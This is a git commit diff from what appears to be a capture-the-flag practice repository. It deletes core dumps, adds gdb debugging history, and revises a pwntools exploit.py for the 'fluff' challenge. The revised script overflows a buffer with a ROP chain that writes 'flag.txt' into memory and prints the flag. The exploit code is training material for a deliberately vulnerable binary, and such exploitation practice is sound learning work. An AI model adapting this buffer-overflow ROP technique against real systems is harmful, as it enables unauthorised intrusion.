deleted: x86_64/badchars/core
modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
This commit is contained in:
parent
4c25bd9188
commit
406768c5fe
Binary file not shown.
@ -1,19 +1,4 @@
|
||||
quit
|
||||
quit
|
||||
continue
|
||||
nexti
|
||||
nexti
|
||||
info reg rdi
|
||||
stepi
|
||||
nexti
|
||||
info reg rcx
|
||||
nexti
|
||||
info reg rbx
|
||||
stepi
|
||||
info reg rdx
|
||||
inro reg rbx
|
||||
info reg rbx
|
||||
quit
|
||||
stepi
|
||||
continue
|
||||
stepi
|
||||
@ -237,3 +222,35 @@ x/x 0x601be0 + 8
|
||||
x/x 0x601be0 + 9
|
||||
x/x 0x601be0 + 10
|
||||
quit
|
||||
continue
|
||||
context
|
||||
x/x 0x7fff0b74fed0
|
||||
x/100x 0x7fff0b74fed0
|
||||
quit
|
||||
break *0x400639
|
||||
continue
|
||||
context
|
||||
continue
|
||||
x/s 0x601be0
|
||||
continue
|
||||
x/s 0x601be0
|
||||
stepi
|
||||
stepi
|
||||
x/s 0x601be0
|
||||
quit
|
||||
continue
|
||||
continue
|
||||
quit
|
||||
break *0x00000000004006a3
|
||||
continue
|
||||
continue
|
||||
quit
|
||||
break pwnme
|
||||
run
|
||||
continue
|
||||
break *0x00000000004006a3
|
||||
continue
|
||||
info reg rip
|
||||
continue
|
||||
info reg rip
|
||||
quit
|
||||
|
Binary file not shown.
@ -13,37 +13,35 @@ letter_lookups = {
|
||||
def write_str(dest, string, payload):
|
||||
payload += p64(0x00000000004006a3)
|
||||
payload += p64(dest)
|
||||
for c in string:
|
||||
payload += p64(0x40062a)
|
||||
payload += p64(0x4000) # if things go wrong, check endian/order
|
||||
payload += p64(0x0000000000400610)
|
||||
payload += p64(1)
|
||||
payload += p64(0x40062a)
|
||||
payload += p64(0x4000)
|
||||
payload += p64(letter_lookups[string[0]] - 0x3ef2)
|
||||
payload += p64(0x400628)
|
||||
payload += p64(0x400639)
|
||||
|
||||
|
||||
for c in string[1:]:
|
||||
payload += p64(0x40062b)
|
||||
payload += p64(letter_lookups[c] - 0x3ef2)
|
||||
|
||||
payload += p64(0x0000000000400610)
|
||||
payload += p64(0)
|
||||
|
||||
payload += p64(1)
|
||||
payload += p64(0x400628)
|
||||
|
||||
payload += p64(0x400639)
|
||||
|
||||
return(payload)
|
||||
|
||||
|
||||
prog = gdb.debug('./fluff', gdbscript='''
|
||||
break *pwnme + 151
|
||||
'''
|
||||
)
|
||||
prog = process('./fluff')
|
||||
payload = b''
|
||||
for c in range(40):
|
||||
payload += b'a'
|
||||
|
||||
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
||||
payload += p64(0x00000000004006a3)
|
||||
payload += p64(0x601be0) # set rdi
|
||||
|
||||
payload += p64(0x601be0)
|
||||
payload += p64(0x0000000000400510)
|
||||
|
||||
payload += b"\n"
|
||||
prog.sendline(payload)
|
||||
sleep(1)
|
||||
print(str(prog.recv(), 'UTF-8'))
|
||||
prog.interactive()
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user